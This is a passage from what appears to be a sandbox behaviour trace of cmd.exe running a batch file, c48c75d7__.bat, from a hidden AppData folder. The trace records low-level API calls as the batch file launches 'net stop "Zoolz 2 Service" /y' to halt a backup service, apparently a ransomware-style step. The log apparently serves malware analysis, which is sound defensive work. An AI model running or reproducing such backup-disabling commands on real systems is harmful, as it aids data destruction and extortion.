dwThreadId=0xb68)) returned 1 [0037.695] CloseHandle (hObject=0x78) returned 1 [0037.695] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0037.695] GetProcessHeap () returned 0x3e0000 [0037.695] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0037.695] GetEnvironmentStringsW () returned 0x3f8408* [0037.695] GetProcessHeap () returned 0x3e0000 [0037.695] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0037.695] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0037.695] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0037.833] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0037.833] CloseHandle (hObject=0x74) returned 1 [0037.833] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0037.833] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0037.833] GetProcessHeap () returned 0x3e0000 [0037.833] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0037.833] GetEnvironmentStringsW () returned 0x3f8408* [0037.833] GetProcessHeap () returned 0x3e0000 [0037.833] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0037.834] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0037.834] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0037.834] GetProcessHeap () returned 0x3e0000 [0037.834] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0037.834] GetEnvironmentStringsW () returned 0x3f8408* [0037.834] GetProcessHeap () returned 0x3e0000 [0037.834] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0037.834] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0037.834] GetProcessHeap () returned 0x3e0000 [0037.834] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0037.834] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0037.834] _get_osfhandle (_FileHandle=1) returned 0x264 [0037.834] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0037.834] _get_osfhandle (_FileHandle=1) returned 0x264 [0037.834] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0037.834] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0037.834] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0037.834] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0037.834] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0037.835] SetConsoleInputExeNameW () returned 0x1 [0037.835] GetConsoleOutputCP () returned 0x1b5 [0037.835] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0037.835] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.835] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0037.835] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0037.835] _get_osfhandle (_FileHandle=3) returned 0x74 [0037.835] SetFilePointer (in: hFile=0x74, lDistanceToMove=1039, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x40f [0037.835] GetProcessHeap () returned 0x3e0000 [0037.835] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7488 | out: hHeap=0x3e0000) returned 1 [0037.835] GetProcessHeap () returned 0x3e0000 [0037.835] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7358 | out: hHeap=0x3e0000) returned 1 [0037.835] GetProcessHeap () returned 0x3e0000 [0037.835] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7230 | out: hHeap=0x3e0000) returned 1 [0037.835] GetProcessHeap () returned 0x3e0000 [0037.835] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f71c8 | out: hHeap=0x3e0000) returned 1 [0037.835] GetProcessHeap () returned 0x3e0000 [0037.836] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0037.836] GetProcessHeap () returned 0x3e0000 [0037.836] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6fb0 | out: hHeap=0x3e0000) returned 1 [0037.836] GetProcessHeap () returned 0x3e0000 [0037.836] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0037.836] GetProcessHeap () returned 0x3e0000 [0037.836] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e80 | out: hHeap=0x3e0000) returned 1 [0037.836] GetProcessHeap () returned 0x3e0000 [0037.836] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0037.836] GetProcessHeap () returned 0x3e0000 [0037.836] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0037.836] GetProcessHeap () returned 0x3e0000 [0037.836] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0037.836] GetProcessHeap () returned 0x3e0000 [0037.836] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0037.836] GetProcessHeap () returned 0x3e0000 [0037.836] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0037.836] _get_osfhandle (_FileHandle=3) returned 0x74 [0037.836] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x40f [0037.836] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x14b2, lpOverlapped=0x0) returned 1 [0037.836] SetFilePointer (in: hFile=0x74, lDistanceToMove=1074, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x432 [0037.836] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=35, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ΓÇ£Zoolz 2 ServiceΓÇ¥ /y\r\nerviceΓÇ¥ /y\r\nfailures\r\nnded\r\n") returned 35 [0037.836] _get_osfhandle (_FileHandle=3) returned 0x74 [0037.836] GetFileType (hFile=0x74) returned 0x1 [0037.836] _get_osfhandle (_FileHandle=3) returned 0x74 [0037.836] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x432 [0037.836] GetProcessHeap () returned 0x3e0000 [0037.836] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fbad8 [0037.836] GetProcessHeap () returned 0x3e0000 [0037.837] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbad8 | out: hHeap=0x3e0000) returned 1 [0037.837] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f3f90 [0037.837] GetProcessHeap () returned 0x3e0000 [0037.837] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x10) returned 0x3f6a58 [0037.837] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x46) returned 0x3f3ff0 [0037.837] _tell (_FileHandle=3) returned 1074 [0037.837] _close (_FileHandle=3) returned 0 [0037.837] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0037.837] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0037.837] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0037.837] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0037.837] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0037.837] _wcsicmp (_String1="net", _String2="CD") returned 11 [0037.837] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0037.837] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0037.837] _wcsicmp (_String1="net", _String2="REN") returned -4 [0037.837] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0037.837] _wcsicmp (_String1="net", _String2="SET") returned -5 [0037.837] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0037.838] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0037.838] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0037.838] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0037.838] _wcsicmp (_String1="net", _String2="MD") returned 1 [0037.838] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0037.838] _wcsicmp (_String1="net", _String2="RD") returned -4 [0037.838] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0037.838] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0037.838] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0037.838] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0037.838] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0037.838] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0037.838] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0037.838] _wcsicmp (_String1="net", _String2="VER") returned -8 [0037.838] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0037.838] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0037.838] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0037.838] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0037.838] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0037.838] _wcsicmp (_String1="net", _String2="START") returned -5 [0037.838] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0037.838] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0037.838] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0037.838] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0037.838] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0037.838] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0037.838] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0037.838] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0037.838] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0037.838] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0037.838] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6cf0 [0037.838] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0037.838] SetErrorMode (uMode=0x0) returned 0x1 [0037.839] GetProcessHeap () returned 0x3e0000 [0037.839] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0037.839] GetProcessHeap () returned 0x3e0000 [0037.839] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0037.839] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0037.839] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0037.839] GetProcessHeap () returned 0x3e0000 [0037.839] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6d58 [0037.839] GetProcessHeap () returned 0x3e0000 [0037.839] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6e80 [0037.839] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e80, Size=0x122) returned 0x3f6e80 [0037.839] GetProcessHeap () returned 0x3e0000 [0037.839] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e80) returned 0x122 [0037.839] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0037.839] GetProcessHeap () returned 0x3e0000 [0037.839] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0037.839] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0037.839] GetProcessHeap () returned 0x3e0000 [0037.839] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0037.839] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.839] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0037.839] GetLastError () returned 0x2 [0037.839] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0037.839] GetLastError () returned 0x2 [0037.840] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.840] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0037.840] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0037.840] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0037.840] GetLastError () returned 0x2 [0037.840] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0037.840] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0037.840] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0037.840] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0037.840] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0037.840] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f6fb0 [0037.840] GetProcessHeap () returned 0x3e0000 [0037.840] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x4e) returned 0x3f8278 [0037.840] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f71c8 [0037.841] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f71d0, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0037.841] SetErrorMode (uMode=0x0) returned 0x1 [0037.841] GetProcessHeap () returned 0x3e0000 [0037.841] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f71c8, Size=0x5c) returned 0x3f71c8 [0037.841] GetProcessHeap () returned 0x3e0000 [0037.841] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f71c8) returned 0x5c [0037.841] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0037.841] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0037.841] GetProcessHeap () returned 0x3e0000 [0037.841] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f7230 [0037.841] GetProcessHeap () returned 0x3e0000 [0037.841] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7358 [0037.841] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7358, Size=0x122) returned 0x3f7358 [0037.841] GetProcessHeap () returned 0x3e0000 [0037.841] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7358) returned 0x122 [0037.841] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0037.841] GetProcessHeap () returned 0x3e0000 [0037.841] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7488 [0037.841] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7488, Size=0x76) returned 0x3f7488 [0037.841] GetProcessHeap () returned 0x3e0000 [0037.841] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7488) returned 0x76 [0037.841] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.841] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0037.841] GetLastError () returned 0x2 [0037.841] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0037.842] GetLastError () returned 0x2 [0037.842] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.842] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f7508 [0037.842] FindClose (in: hFindFile=0x3f7508 | out: hFindFile=0x3f7508) returned 1 [0037.842] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0037.842] GetLastError () returned 0x2 [0037.842] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f7508 [0037.842] FindClose (in: hFindFile=0x3f7508 | out: hFindFile=0x3f7508) returned 1 [0037.842] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0037.842] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0037.842] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0037.842] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0037.842] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0037.842] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0037.842] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3f4040 [0037.842] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.842] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.843] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.844] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.844] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.844] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0037.844] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0037.844] GetProcessHeap () returned 0x3e0000 [0037.844] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4040 | out: hHeap=0x3e0000) returned 1 [0037.844] GetProcessHeap () returned 0x3e0000 [0037.844] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa) returned 0x3f6a70 [0037.844] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0037.844] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ΓÇ£Zoolz 2 ServiceΓÇ¥ /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ΓÇ£Zoolz 2 ServiceΓÇ¥ /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ΓÇ£Zoolz 2 ServiceΓÇ¥ /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xb74, dwThreadId=0xb78)) returned 1 [0037.848] CloseHandle (hObject=0x74) returned 1 [0037.848] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0037.848] GetProcessHeap () returned 0x3e0000 [0037.848] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0037.848] GetEnvironmentStringsW () returned 0x3f8408* [0037.848] GetProcessHeap () returned 0x3e0000 [0037.848] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0037.848] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0037.848] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0037.985] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x1) returned 1 [0037.985] CloseHandle (hObject=0x78) returned 1 [0037.985] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000001") returned 8 [0037.985] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0037.985] GetProcessHeap () returned 0x3e0000 [0037.985] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0037.985] 